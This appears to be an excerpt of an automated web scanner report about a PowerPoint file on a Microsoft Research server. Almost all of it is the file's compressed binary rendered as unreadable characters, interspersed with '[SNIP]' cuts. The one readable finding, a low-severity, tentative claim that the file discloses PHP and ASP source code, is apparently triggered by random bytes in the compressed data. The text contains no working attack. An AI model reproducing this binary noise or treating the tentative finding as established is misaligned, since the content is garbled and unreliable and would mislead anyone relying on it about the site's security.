.....Sn..c....R79Y...Ak.....g.`..[xL2.....f.\..J..?5.....l..A.9.W...%..:.    ..X.64.T..,.....U0.E)`#.5.h.C0.cR..}......u.3.mg_.R....~<:BC6.....C...Q    ..."........_...Xq...a..8/.:E.L.p..s...#..V).Q...... U.0.......2h...B.....|m.\..C..b...h.L..hAP].v....|.r..m.Y......:.....#..B..,..;.X=..,....(G\.Y........kzo.P..n.I^...d...y.#.........ks...|l2.R~.6Ma....Z~.c......*.'.m.."+.......M......U...Z..^,k....(.......GE..o.zC......~O.. l ./.....i...8.A.L..5m..j......Q.....0...,.>..........4vna..vl....'S....A.8..h........]...2%M0..p...g...$..h.n.    ......PK..........!....."....4......ppt/tableStyles.xml..[o.0...'.? ..p..J'...m.].w..E3........s...i...&<...s.9..c...]......".D.D..$..8..,..e.LQ.P..!,.....J.p...Yx........
   ...:-.....lVE.I.V'.:..o...B._..Y\.......I2fY....'+K.....k...o.M...H.    L...E...j?...l....S..........K...2..!(...(Jr$.D..u...%$...;..~Y.9.HVB..Yb..EI...
...nBh.K.F?.....o_J......r....P..B.....0Y!.7.n.8)s    .T....U~E..
..A
..[. .$1..n0'*v......b..Q......e.P.'....U.'.....h..-.....G.....!...ir..8.H".....$B.....@l$..m..g6..x.......w.....j..!..~R..o....|OFstV......./.H[......9..%.9...7..im....!m..h...3B.KWi............:..1x..&....j.{]+..BB.].y....j.J.=6....."......w4.n-.EZ.D.3...n;.k,..{...@..S.l:."/.@U....1..FL.L....'.Y.&.|!.N..t$To..^..........b6.3f....0.s.V./b.........    1_F>..f..B..(.C..JU.........}.1..jK.m...T\...\.4M....I.;W.......    .}WH'.<`....d.7......u....cdIz~...;.R%...C.2$.{'~l...u2.;..@6S...k@.m...+.O..`>W4M.v.#=..'..0.......S=..o.....7.3.....o.'..........%.Ae{...V...g...............1..s..q+...<......]*..`......UY..B..MS.....V.90<..}[7.U.b..b..JS...+.Mr7.3f....0.s.V./b........19.......M.\{....K....2...b2/............PK..........!.0...5...........ppt/presProps.xml...N.@...M|...v.5.I.A`.4^..........V.....VL.\0...f..Z....`.l..3.y.....>b..x..........}+d...n..(T..-Y?.#..PF.j.&...J..3.(K....-=... .4.h...Kndm......nW.*sEgh...J..`U7x.5..~..X)..X.#..o..`.A..y..Mm(.F.g}...................Tz..#&.O.Q.'....q`.(4.A...'.....i.X..+A...9...@.WYN
Y.%...#........Q.....|...?.......PK..........!.:...............ppt/viewProps.xml..Mk.0..............SZ...B.....&..,    IN....l.....7..........Qd..K.+:.O)................L.........f..H..v.../YE.!.2I<_C.......2.a.CW'..-
7*..4O.&5...-.f...~..6.. .@...~-.?..[....2}.............l....._.GU...K...-P....N6r...nT...x.U ~..}...&....}.iZ<N)am0/...!.....".z%..L1..%N..v.L.)d..,>...+}G........C0..7....[.'k.IW...x.d...4.    .q~."......&.....0nO.5..l..k.....88>. ....t.^..~    ]8"..\..v...H_...h.@.5.._A...p. ..5.....]N.....8.t...>.i..FG.-}E.k...}.    ......PK..........!...J.u...........docProps/core.xml ...(...................................................................................................................................................................................................................................................................|._K.0.....C..o]..[.m...........m.&I...7i.....{N~9....Z......*q2.1......./.i.ad.U.....o......`:g..'.h0N.E..l.t.W.....V ..y....1.:.i.DS.A.@.8..    .r.(    .H.D.Er6 ...;.g.j...%.(!?^.F.?.t..S
....6.>..^..k+.c........'.m...U..
.b.....    WCu.2.TS..N.    .....]}......p....1..WSm'.Fa.5.n..f!._o..o%.|...U6.(.....m...8...~.;....v>...7..4J...Y~....=.:8......?1..t<O<.....;@.%>...o.......PK..........!...6.....V.......docProps/app.xml ...(....................................................................................................................................................................................................................................................................V.n.6....;.:.@m.....Z........9.....bC.*I.qO}..^..C.R.]Uh.........|.C..d..@......G........{...x.X&c&...w......n..A[...    if^jm>.}...13D.DI.t.,......G.PQ.....ht.....C<...^eqz...h."....=..p@..2....W7o.#..n..J....P.Z..<.<b.A    V<.....u.>..#....R......w....g.k90...$L..|=.^C..E.a..5.S.|7....?.........?*.;..S.Z.%.c.g1*^...j.xn...K.FL..a
.&...f...9
l..&..;=@d.&...$.xd..8pg..i..E..Z.S.En..........\...k>    ....z.+[.k..[...\.pD>..mV.../...X'.......H.\.G....V.K.`.^.=m`A.Z..    G0..\eY!..$.;D..RC0..G..wZ.&.!\..3i...N..LW=....r.....z.......62........4*...X+.."...6....L..d,d....)\..5......H..tz.W..".....3H.&....3...x..T)..    u.......3..o....F.:.L...V....(..IyNv`..(...,-H"G.{i.K..y7..cC.[....)D4v..3z....H...5..^....9.\ ...(..I...Jc.u....ZM...$..N..HH.5..|:...B..\..q.6%...w..T.bn.m.u<p..T.D.!..>>_T.n.9.G....EKN.fH~Z=,q..;...}...[.f.    ....E.RS,_..#......S....."....2Lm....Lu
.........t9g..;.}O-......s..w.-4.......H.n....6e...T.U..E....b0s&O..k.t..4.%......g..o..3..b.7i.21....u...;.m.....=.....7.~...`|5..WN........    ......PK..-.........!....\x....7....................[Content_Types].xmlPK..-.........!.h.t..........................._rels/.relsPK..-.........!.H.\.........!..............    ..ppt/slides/_rels/slide14.xml.relsPK..-.........!..T.H........!..............
..ppt/slides/_rels/slide12.xml.relsPK..-.........!..+(x........!.................ppt/slides/_rels/slide15.xml.relsPK..-.........!.!...........!................ppt/slides/_rels/slide13.xml.relsPK..-.........!..r..........!.............F...ppt/slides/_rels/slide16.xml.relsPK..-.........!....+........!.............^...ppt/slides/_rels/slide17.xml.relsPK..-.........!...~.........!.............w...ppt/slides/_rels/slide18.xml.relsPK..-.........!.IF
J........!.................ppt/slides/_rels/slide19.xml.relsPK..-.........!.|..........!.................ppt/slides/_rels/slide11.xml.relsPK..-.........!....X....V... .................ppt/slides/_rels/slide9.xml.relsPK..-.........!.K.=.....7...!.................ppt/slides/_rels/slide20.xml.relsPK..-.........!....k........ .................ppt/slides/_rels/slide1.xml.relsPK..-.........!.5.4f........ .................ppt/slides/_rels/slide2.xml.relsPK..-.........!.7......V... .............9...ppt/slides/_rels/slide3.xml.relsPK..-.........!.7.$F....V... .............f...ppt/slides/_rels/slide4.xml.relsPK..-.........!.J........... .................ppt/slides/_rels/slide5.xml.relsPK..-.........!.........q... .................ppt/slides/_rels/slide6.xml.relsPK..-.........!...5......... .................ppt/slides/_rels/slide7.xml.relsPK..-.........!.4.......U... .................ppt/slides/_rels/slide8.xml.relsPK..-.........!....7....W...!.............<...ppt/slides/_rels/slide10.xml.relsPK..-.........!.K.=.....7...!.............k ..ppt/slides/_rels/slide21.xml.relsPK..-.........!... .........!.............i!..ppt/slides/_rels/slide22.xml.relsPK..-.........!.............!.............."..ppt/slides/_rels/slide33.xml.relsPK..-.........!.c\#.....7...!..............#..ppt/slides/_rels/slide34.xml.relsPK..-.........!.u.|]........!..............$..ppt/slides/_rels/slide35.xml.relsPK..-.........!..+..........!..............%..ppt/slides/_rels/slide36.xml.relsPK..-.........!..T..........!..............&..ppt/slides/_rels/slide37.xml.relsPK..-.........!....m........!..............'..ppt/slides/_rels/slide38.xml.relsPK..-.........!...M.........!..............(..ppt/slides/_rels/slide39.xml.relsPK..-.........!.i.'f........!..............*..ppt/slides/_rels/slide40.xml.relsPK..-.........!.(r..........!.............-+..ppt/slides/_rels/slide32.xml.relsPK..-.........!.~)GU........!.............E,..ppt/slides/_rels/slide31.xml.relsPK..-.........!...3.........!.............^-..ppt/slides/_rels/slide30.xml.relsPK..-.........!.KbT.........!.............v...ppt/slides/_rels/slide23.xml.relsPK..-.........!..;.W........!............../..ppt/slides/_rels/slide24.xml.relsPK..-.........!.............!..............0..ppt/slides/_rels/slide25.xml.relsPK..-.........!............!..............1..ppt/slides/_rels/slide26.xml.relsPK..-.........!..Deg........!..............2..ppt/slides/_rels/slide27.xml.relsPK..-.........!."...........!..............3..ppt/slides/_rels/slide28.xml.relsPK..-.........!....4........!..............5..ppt/slides/_rels/slide29.xml.relsPK..-.........!.0R..2......................6..ppt/_rels/presentation.xml.relsPK..-.........!.H.sp.......................9..ppt/presentation.xmlPK..-.........!.W.9.\....    ................[=..ppt/slides/slide29.xmlPK..-.........!...m.Q.....................@..ppt/slides/slide19.xmlPK..-.........!..;w.."...6................pE..ppt/slides/slide18.xmlPK..-.........!....r.....:.................g..ppt/slides/slide33.xmlPK..-.........!.0.A.......................as..ppt/slides/slide17.xmlPK..-.........!.....&.....................1...ppt/slides/slide16.xmlPK..-.........!...6.Q.........................ppt/slides/slide34.xmlPK..-.........!...B.....4    ....................ppt/slides/slide15.xmlPK..-.........!..Y......M.................V...ppt/slides/slide28.xmlPK..-.........!...(B....}.................Y...ppt/slides/slide35.xmlPK..-.........!.....C.....................y...ppt/slides/slide20.xmlPK..-.........!...).)...}.....................ppt/slides/slide21.xmlPK..-.........!.f.........................M...ppt/slides/slide32.xmlPK..-.........!.]\?[....5S................=...ppt/slides/slide27.xmlPK..-.........!...s.....z.................!...ppt/slides/slide26.xmlPK..-.........!.0D2...........................ppt/slides/slide30.xmlPK..-.........!.[\.1T...P    ....................ppt/slides/slide25.xmlPK..-.........!...}(....4C................H...ppt/slides/slide24.xmlPK..-.........!._=m.,    ...+................#...ppt/slides/slide31.xmlPK..-.........!.a[.W..........................ppt/slides/slide23.xmlPK..-.........!..h.O..........................ppt/slides/slide22.xmlPK..-.........!.5.F...........................ppt/slides/slide13.xmlPK..-.........!...`.G...t    ................J...ppt/slides/slide14.xmlPK..-.........!....}#........................ppt/slides/slide1.xmlPK..-.........!..,..2....(....................ppt/slides/slide7.xmlPK..-.........!.T.h......    ................. ..ppt/slides/slide12.xmlPK..-.........!.j........
................i$..ppt/slides/slide5.xmlPK..-.........!.y...7... .................*(..ppt/slides/slide39.xmlPK..-.........!............................,..ppt/slides/slide4.xmlPK..-.........!..<J.G....................../..ppt/slides/slide3.xmlPK..-.........!...........................F6..ppt/slides/slide40.xmlPK..-.........!..e.D.......................9..ppt/slides/slide2.xmlPK..-.........!.?.Cg:.....................?>..ppt/slides/slide38.xmlPK..-.........!..    .m.....#.................A..ppt/slides/slide6.xmlPK..-.........!.Y..a....?..................I..ppt/slides/slide8.xmlPK..-.........!.K.
........................
...[SNIP]...

13.3. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/ppt/plas07.pptx

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /en-us/um/people/livshits/papers/ppt/plas07.pptx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.openxmlformats-officedocument.presentationml.presentation
Last-Modified: Thu, 14 Jun 2007 21:31:10 GMT
Accept-Ranges: bytes
ETag: "07db453cbaec71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:25 GMT
Connection: close
Content-Length: 333288

PK..........!..........!......[Content_Types].xml ...(..................................................................................................................................................
...[SNIP]...
<..._..JB.P....t..~.j.............'.u..~pW.l#Gm...{<%...8....P.g....GP!.+.t...ku..7?...x..x..R.Z...f..=...e.'19Y.^"...q.|....s....T...".....{.B
..#FH.*......x..l&.]..Z.....>Y.q;........B..{.:....6..3........ ".e.o.t.1.b..h..:...K.......+....*...*.L....+....).0....H......T.....^....[.~....
.M....n+hAF.P.Qo..[...I-|F....n\#..I.....*b..|...I.B..U....."....S...k.,=#bH.0...p...b...H....d..2(a..1..."........N...4.Q.....WJDQ..."X........b....... ^.)..z....0.t.s49....A....H...a.:T....T.'..f....a9...W..=T..M..<.".[...8w....{r.6J.3...5%k..(_G.].(..1@....L..............`.j.a.s..BC..-.s...H2...vt....1...s....L...qg..........@.A..W....gW....n.. .e....P......<.".d..c..@..6.....k.m........-....c.
..@..S.N9.T.o.........W.......d.!....F..fQ.N..x..N.RGh...*....rf-`..\..m..@....^..g.....+.:..#.........F..;.x..k./G..n...N...6....C....T..*v.j.o.&1..]P"T..F......-N;A.....t.i........8..C.G._W.<U .v....6pA...|O.V.B..A..x..Pg.A.....u....5.C...!..*mNb}.Zn..Ck%B.,Z.1b.....ro..$..6.<Pl\..A&R.'4..nv.D"Kp...nh.k.1..m..w...m..=.4v...n.5.z.[I..|....1..g.....    [PQ...q.*eTU..*._.d3.jZ....s4...fjl..2.K.%...;4.....T.@.q(..D........ ....m..%>......@..V..F2P.o....qg.,..    ....|#....N.%8z..*G...2H................TEV6..R....bD..r..:...^..../.*.....6A.1y..A[.zh.p..a...h....f.........0..9..~.H..m.H;<..t.z.hdl.O.....z.H4:..$..5.F=...hTI.ZbA..lG
...[SNIP]...
<>2.M@.....N.x...W...%....0[.fp.J.}Be..%<%...G-.."..`..hQ.....>v..    '..aU..%*;........PK..........!..b...    ...G......ppt/slides/slide19.xml.\[S.:.~.....?.y`.....    ....T.2.p.].J...=...n...%...L.....q...[__.j....IbM.(.,.....m.4..8..?o....UH.F,.R>..ya.q...}..E.Yh..}6..R...."..    +>f9O.n..    ..*F..`?..$9t[..p......m.g.a...,...T.N.O....q....|..r..t.Z.M.....ID.E~#8..t.E....P./....#...R6.X...EI... ...B.......br......0.!.G..F..........p.}.m8>[A}h....A.+..2;.a.&.    ...+M...[...V..Ob_..^LMg.3u..-..C2..*..K%.C_@.JX..8....[|..Y?)..|L........ ...Byz...mE..JFV1.'    g.r)Fy...4..u..:...Q.Z....>...I.P./...`Wk.'vY....f.x..]/....u.G.....ra]&,..,...=.............    ....C..y.H..X..:~..(D..N.................n[    |.s....#.'.v.{BJ......N.{p.u..v.9;8.......wN.....{....WA"M..J`,.A..V.......k........qx....W_f~Y2...8...N,G.6..&.....y.2...ZX2.w.-mC.....BU.b.V..........1W.TrC.(.O.d....1..&>.,be....[.5*J..........G.......~..g.....(..P?.J.....B%9H.|.0..28.1W..2RW<.....m...,.9.....PZ..4......%.g.oa..y.v:..u..I.I..N...)......E...M...t.M...T..NA.h}A.....W|X.!.R.    .$...%...!<..%%55..IR5t.nX.SS>.b.Uc...U.5r...'q..U.Dwf.CM...\/.=K..$...?....AO(.^.m..YvG..j.....&U.q..2.OX......X..s6..Zo..c&
..5..~.z.G...0..:......P...j.........sb.HJ.~..;.c:P[.fJ...&..U5..ZAit...u..n.e.n7Z.B...e.L.Z-S...Z.B....].[.m\/p...qf..5.l.3..
.    e...Ws....W..*OVn....~.6.....b....qk[....o.6k.~.5..)U..l.6n..}.B...[.6k.I..6..o.di..&....~-.}O....;...M.;.Y2.i{-.%...5..5i.!fyB....\.....7..4r.oi..!.y.\..a........
..$.'..s..2-.zg....lH...;(oR%.^"..=....N..tL.n.;f.Lv.....-Z.g...yg..n.d}.......u...3L.....s..2....xVY....i.f.av...<..}.m.sw..t..............Nc...>{U.v.}./..t....".....>7.....W.9W..p..v.7.> ...~.u..=.<7.y~?(.k-...cn..Z}....<:A.Y....[..Q...V}j...G.^.EY>...K.t\.W.L....y..
..STY...:..F..,......}..b.P.2...57!..Q...jNWT..U......}kq>..,.XaQ..A.&o...J.-.%.....K3Cn.k..>......J......T.......S....1..}.w$.h.M......O.M.m......?...A..Hk..J.p.#..e..Rz.....&5.,.{.L.(...i,9*r9...T/...W..."~...L....T..8N...k...#..@..Na.
.,>.....N.(.D......t{...X1...QFL.%(vF.."/..(*..l"+.-........).8Y.......v7.ns...9N..m...."CT...$.@I4U.....o.............|.%.&qxw.
u7.e.    ..U-...0W..!.ZC...t.b...EX1....'n..H.....|...U.t].U~.D.[&.......|=R....q...I,.I...._TC..0$3=i.O..ZT4.z....{..r`i<....`i...).....q`.Y.5x..F.....|...ak...d..j|..3.":.%>K./ .g./......0..D~...
..E1.y.X#c....~6.90.o.m....pSG....0m...6p[.....7.F.......:.x?p3....t.....\.........>
...[SNIP]...
.......ye.>.....rgo.........Cf..W..g....~..O..O...8BIM.!.....U..........A.d.o.b.e. .P.h.o.t.o.s.h.o.p.....A.d.o.b.e. .P.h.o.t.o.s.h.o.p. .C.S.2.....8BIM..................:.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="3.1.1-111">
...[SNIP]...

<?xpacket end="w"?>...XICC_PROFILE......HLino....mntrRGB XYZ .....    ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXY
...[SNIP]...
. ....... . ..0.._iL*w...eo..>.{..Io'...3.R.rD...^........#.q..=..l9{.F.......0....=)&....A.E...[..&..,..|
./.V......q.i.X...h....*.~ird$...Td..tR.F....C.F...]......u7g~...kp*|C....?t..V.w.7.X.'!;..%<?`0._.jb.(L.z...~....6....w..[x..X.tv...,#.D 6.z.gldT...."@.v4.z....>R...."@.J$@._...U5...V.lOe`...T..".D`.    PJ.M.N..."@......i........."@.6.@...6_%j...."@..... ...|I:. .D..lC....a..JD....".....m,_.N.... ....9.m.)... .D..l,.r~......"@...6$@.o.v
.D.... ..K ..[..z..b...S..M............4..6..!
j.l...&4Z.U..-i..6.8"@.*K....{:8......:&...lS......6...>.;]....M...m..!....G....%....j..[...Bv.].|.X/..x...m.X...ie....i-.$6N>I&.D..lC...=Q.......Z...O..Q........Xq..>.K.......b.)^..0D3.9....j[q..0.*.Ur.gT?a................*.F.L.........X...l...2j....;...    ...8.....:........L....!.a."....ke.P.QK..g..O.m..'...^'P...'k...(d......?...X......c.......d.../b...*..3T.u..\M.s1.V..l.T.M.
...V..V.....,.=c..2.T.
.\u.....d...?.....fNb..@.&@a_..@......6..Z...NnE...!..5.uI.U..l.n......,x...p.w.wp.."@....pyq#.D^L.u$d.....t.\W...H.....Z.Ur.#:.............\2......jd.&...2K.kSS..<...pnq.{.)a.....+..)*.....t?b.}8.[......Kt'..e...W.K.N.\(...!.(...mn...B|..$.+f7.#M..CT..:.|GxT."..*D..........._.K...a.......Vz2..|q.X.M..v...."!}./a..#...g..D/)$..k....\..|D(G.r.E.TV..W@...1..2H.hcY\.2. ..&P..........K+.s.....kw.....J..3x..l._.g..~Q..MN....L...8&H`...T".[...=.'#BI...ksr..t......ZE'.0c........`E....Q*.2.../.C :.J....*J.....(......>....\.rs^l
M......j...    R{..j>.|h...N....$.*f....f..VzXM.......P.z......x..z?O].S........c7P,.4....c.s.....$..BIE+`.}W.}.n.w..G...........(-a.`"..3.L#<.VT.....K.
V!A;Hk.|...W....l....$'Wa....V....%......:... .D@...#?..O..B...u2.W...."@...V....`.l.u....N".[.v...+.... ..i.=..d:. .D`O..i.=..d4. .D`...5.=?.... .D`.....o..../.+L.....+..D....T..u... .D`G..q~..2.....zP.K...Y..T...        8....z.h:=.u......kBo..X.44.6.med.."@.....E ...#...e.....lK?.x)U[..$N........L..k.......v.g.;........'.....f<.u<.7TY.N.... ..C......;.z.l....l.    .S.n9.y?..s.. ..w&j...~U....X......v...Ac.q.X<.....$.C.S]I....6..b.U...w.....?T...Ne~]U5.on1T..(.x.3.T..e..m...V... .;.@..{.\{ <............D.=[..X2.=W3~3..i.......n..M...K_..6...^...V}*..@.Go.....5..N..+6.....|![....X<.Wg.>.;:.W./.^.s........{....G.d..m.D{... .D`..(.K...V1.i.}.iP{....w..%......z..__.Gy.<....#.z2.#.A.=..Z...@..K6..+......7Tr'W...n......I7.{}7<w.......o.>.F.j.."@.v...W}.v.E..+-G......n..uP[.s.F.$....h.    ...uL.r?......K.#..,LA.w..r.r~2BM^$n...26...~D.?..Qc..'>.4......4*G...............rBP.....C.ww......Bu.=..Y..........Q:..P.L......G..##.7..-.n.O
n:N..#../E.'......+....q..t....h.}^.H..^|c..(.... .D......=!...Z.!.p.E.............pW.....=)6~E..s.-ga.O...Z#....H.U5....9.8...;..$........R.$..2[r...........g....z.@...
;t.....l...6.%.D...U..n....d7. .D`...w{...'.... .{.....`.oo.Q$.a.3R9*D.......(.........."........s....."@..+.G.D...."@....#@.o.u..K.... ... .W>C.@.... .;..9...a... .D...O.._..I.. .D...0...vX...D...."P>.r~.3$    D...."...T..--..s..z...&7.adv...'...L......q~K+mU.U.....2u}...g.w..w...*.....("@....(......yTl-.[....l.|(...m......H.|.......n$...."@..'.k..f..p08....8.
!.U.3#:.T..J.}FT.S.CC....9..z....j[Y.t..yWga.d.=1..d...1L...k........G.iaT........A.....I.4.li.Qoo/*/.Y.4C<.yjYF.{....~..X..$    D....%...%Fx8..}..t<..o.,.:..7..L.!Y.x.Nh.Zo.z. .....Z.3...N...e.jx..\'x.}}.....X.Q.s...>..VzF..nK.=U..l..u.....Q&L>..y
s....S.k....(.^p..S....[..k.U+.`T..e...N_...y....Y..B....n.N.eY...f.e..1.n..&.D....R..r~<p.._.........}:....w.]0.k.d"......t..\...H.....h.y1.    ..m.Txi|mjj.....cs..!../.l]b.}..}:.r....Z.......d^L..o....u.....................:..e...x$..e..q..... .D..l2.8....3..".+.&.\....e.F$..i.x.57./.1G.
IE.U......,.G...u'<.j    .F.R.u.^6YZr...."D....%...Ad.._.....<..W..Bv......n.0Q.vG........u.....S..r9..Q4V.C6.4."&..R.dn.B..pY.vY..C3..c..WGYw*..uk...a,.:o/...miE.V..I.. .D ..8...P.YM.......F(.3.nO.U......ZG]..,.M+....=.b
K..L.rs>`..T7..p.~.'F0.E.=....z...S..8|.Kt3..G7.f2.Z.0...Y&.]54.=.&+....y{....K.7.k<Ra"@......*......M...Miqw7..}.N.........i.    .."@.....R...}....h.4y...M..."@..    .F~0qG..@t..*za*I.....B............. .D`......@.&... .D`.    ........D...."@.*A`........J..K..........Z.,...hk.B..R.\.2..W9.&z?.|.\..'qD....I ......c...x.2......Q}j.v....=C.......z.X.........m....u^x....mF+......V.J.."@...@.........e.q.......Z.f.g[6....F/.iV.?{r:....tw..>.;#W.%;Y^.|.......)O.."@......[.w..\..j.c..~...`.....'D.8..-..e.h..5cY..SF!..}..F........../....V..J....//._...a......>.y?+,..-u...[..;_....F.m....n..RL..$.7.T...C....T..UU....Cu.....;..T..e..5..T....".....[.}..z4rD...<.........Y;..>t......$/.X1...O......=.:}#..cqj-.?>..a.....R..."]p..R..h...z..
..1.V...^......u7g.F..4j.y..F.+......U.]6...K:DM.......:..P.|w.k.g..,.......|![....X<.Wg.>
...[SNIP]...
O..B.O.../.x.C...v.C..y..Z..+X.L?.^..g]Q.fs...\>/....z.lV./....5..l%z.........{7......a
..;.IO.3.(.R.........'
....(..H)}b...*.k..E..e:3.?*....o.    ..G....y.:.[........3..p.E.#._..K.........?.V.?. .`.<?.|0.>"i~..._..q=....O..uQq...O.d...o.xk.J9.'.j.1.\.......a'....V._...:.X.X....e....G...3L.//.ahbp. ...%.d..S...*b....N....i(B.4W..:.....Ju(....^.I....(....B.(...(...(...(...(..v...U..........wm.j6.3Y.._......Wv.......q.ms.......:......".j..^........B5K.+Y.,&.....h..........^^,...^.....33..YN.
...F.I~.sN.%+R..RW.o.u........i$.R.VR.Z..K.\.D.......zw.~6|f...x......".....)....@..4:5...umZ....w...0...t-.#....`.......W......ce.i....{n......e.]..m....R../-..".V.K.../........Z...*96O...&.*.haT'Ia..p....G.R..
Q..Q..p....y..V.X.D..'^...nr.9M.{>g&....uwm..X.....>!.O.....x.\._.mn..k.}c.Z.....Y.....x.Z...R......7v....W&.....E.c....2.G[..M.O..|1.Mo.I..g.......]oV.tVVzd^...m7U.....zv.....]\K........-..<..S.rz..T.r.._.C..i.0...R...x_c*N....6.0.....QQ.T..,N!O.,Ee>wS.U.....u9..........w.;.0x..v.i.Z...6.h....K...C&.&.....c.r.`..I#j/hbk........\|e..w....._.~$....h.w.k....o../.,#..<....Tm.q.....h.[&.].Q........A.9.w.,~..................> .......z...s............[....K7V.....M....;...V..|5.j...z.Oi..v.._\.....x..B.,......m.vA...*.9a......hG".0.%<]......Q...Z.LM,j..i.    ..z..
......(U....z.Ya......)a...VJ.#...'i.T........$..,../.g.".`...<E..|Q.....C.kz.....;uqkwu.k...6....7vVwS.Z.......i i-.d.<a.s...=..^.......^9...t....@...<I.m..ZQ.........J....y....6Z<.v..;X.....O=.=OE.tF.]gI....4.-kL]N......R...j.".(....2._..-n....E....~S,v..[..K2.J.....l3.B..}V.l=yA..E....T.%%.....R.yF.!R.8...l.8Fs.\.|....%.E..V.\..W%_.x.ux5..u..m...miu;......;+?#R.....g.6..\..[E..l.5A.i?..+h>..~....!h.<Qt..&.w.....w.|E{....]........ ..e....J.L8q...MO.^/.|/.........x.......-..uo.x...w...&..5.c[]Fm..T.`....F......m<a..O...ta|>[.a.......qtp....V.#.v.)b..u*....W...V    R.    .s.(..z..86.5Jr.<M8...r.zR..w.Zn/..G..{....|%.i.$...O.~........:....'x.E....Z[..ZxON.t.n....V..VV.....ip..Z....o..!k.#.%......x.....o..O..x...:....|Ka....7~...4+.r."c....{.x.Hn.N*./...Q..Y.[.    ..............t....-e...m3.7z....i....yii.Mt...Os.[4.T.%\.l...U.,&]...
.......%V.+.Mc...t.......,n.T.....X.?$q\.4.|lT=.lR..U...U)B........IQt...JT.'wN....&.H.|U?...>7.|ouo}gs.-K......-5;..+R...7W...[..]...}..........%.....~...._.....2.>....t.........U..q....j.....W.#...<E....?.........!....:T.q..I.......<K./..3....<a...xS..M.w...<K..cB.&.c....b..4-R..T.........nmb..I..U...9.5.x[4.U...,....n]R....p..S,.r...F*.)...f..+a....6..R.J.r.>+.B.q.j..U.Z-b!*....$.=S.eFM.wu.JWRPv.O........\...x.........&./...|=.......=}4Ko...O..}]....|;gm..WR...X....P.o%..Y|r....y.n|k....u..j..O.Mfi..|c....NId.i.P...o.....cs.K.!..e...#^jkK.h.&......v...hd.;.T...{.GuU..K.+.6........a4..%........2\..O...*^Y..$X..$........f.rkl..xo&.Q..Y.O.`0t.........B..,2..d.:q..<..`....)*3|..S_.....\N'.^.Y.IN.Z...9....M.*.u..9s.].W.?h/.z...y.|o...].s..|>.....+.w.:...Hc...,.....~..-.I<5b.h..B.dDH..kS[.uo.Z..u.>.I.tSP.u.*.&..L....lu.>........kk....X.. .]v.....F2.pY~..Z.9FYv.B.jNU+..^...JnX....x.W.R:...U...&...Rpm5Zs..$.d..n-(F-h.....(....B.(...(...(...(...(...(...(..._.7..?........-...|+......m.m....mg....~...:TQN...j:u...G3,N.....G.Q\y...i....W...c..`1>........0...X5:U=.IrT.R..(..kB.....)..J.i....(....y...y....WL........~....&....o...:..o..l..._...~.|g.............OS......?.>
x..<O.x...>....<..KL.....5..D'F.m}......1...|W....Y./.1j..,.<[s{.2x.U..+x.R..<..Y'..$_......3O..,.(.@.4i...\M....z{..ngZ......+......f.cG4..6./..'.O..~..l....U...,/.R.....4!........u1..W............0.....M7....k2..^.j).Vy.............xZ.*`.C..R..h/._.....|..'...|7........./..X..|V....Y...\...-......m....".n......].S.$ZO.M..+}....o.?i?....|/..t..~0............/...~$..W.t..^'...-....@./.Q.....w....- .E...i.4...........|3K%..U.....'.3.%...1X...../..e..V...\]<-<67.N./.Bx.....8.elG..&..R.....X`h.i.4.8..
s.*..gu...Jt..%E.F.aN.(C..............*.......R..._./.5_.X.xf.M?......jzO.>..o..t'..~8.G.5............|+c{......9......._._..    f...x......l.=......s.#....$..._...7..n...ouo.............w.i.$...........?..K,..Y$..qD.Gga..$0..."8a.8.@v..$h.*...r..r.&6..?.x.3....{9b1.j.|.....|[.`qyV?..`q.).l.....RrU...l..E....:..n".'B.].a.:rRP.R5Uj.m,..ju.T.R..%J....r.p...)R...\.:~._.......;......>....~.........:...S.........$...x....e...YW.....^.........Xt..xcL.._.......F...K.S.../.Z~.....I...^...
.}.^.....<..............;..6..I{..x...^...-+..6.V.g.8...j*.....i.8j9....p.W...y}.FMCS....'
.5#C$.*....G.[.:X.f9..........'........|.cq..5kJ.&u.Zx..    ...%5........B....../...!...8....|W.....>.<... |Q.._..|/._.............<..O
Y[......to.xIf.<5e.k[.}..    m|,.....7...3...w.~=.............s...>..I. .~&..M{.~0....B.-|;......i...|i..6.e.4mW.v.....#./.....5G.7.....x...EO&...x.4r>
....S..Up...e..Q...........Z..s.UJ...\..8w..j.
.qQ.....,L.a..X..g.e*U./......P.,M)..E..F...H....~....?....|...ss...G......X.....,._.zN.....}...M3.....V..}~..Q...j.
..........g..3.^..\z..........>'.O.......|3......g..Eu....$.W.o..j..o..m....[......g.....x..2X.H........lna...~..O...-....o...x.x^$.x....Q..O...(d4.........K..UJ........x\.<..,.Z...\.....m....    ....S...T..........q.....p.|gJ...NU(a),Da.G.y..Jxy*.....W......><.o._....].w.....k...>...\...?.^.^.o.,.2|.......^..V...A..k.;H.......t..w.Z/.<    o...k...=.W.x..[....2....z.......X.&c._.jX.=
.z...&*U..LF..............F.i..x3...v.K...a.Bx.......>.*S.g    V.MB.)..(..=..R.~..zT?.o.k_...................k_...............................&...#....mW.~......g..Z....x....%'...xt.Z....x....%'...xu.4Q.\/..a...M?.G.}...............k_...................k_....................>.....l?.    ...../.=._..S.........k.^..~._....?.....k.^..~._....?.....G.p......4....%......?j.r..3....k..<...........<:?..k..<...........<:..(.........&...#.......O.._.{..5..y..G..].R||....G.5..y..G..].R||....^.E.U....6........|..............~......?..?k..JO...........?..?k..JO......h..._.............U....?.9............u...I................u...I......x.....m..6....._V.....^w...y.....y.W..y^l^f..bgp.D.......g..'xo......|X.P.>5.~+.$.QkO..|.:K..y....w.......m..I....M......6.!.c.=..q.O..xu^.....5....G....F6S....a...RS.*p...)J2Qt.W..F.J...a]H........."..j..a.B..)...N)..7...........u...I................u...I......{.......|......^+.a........^
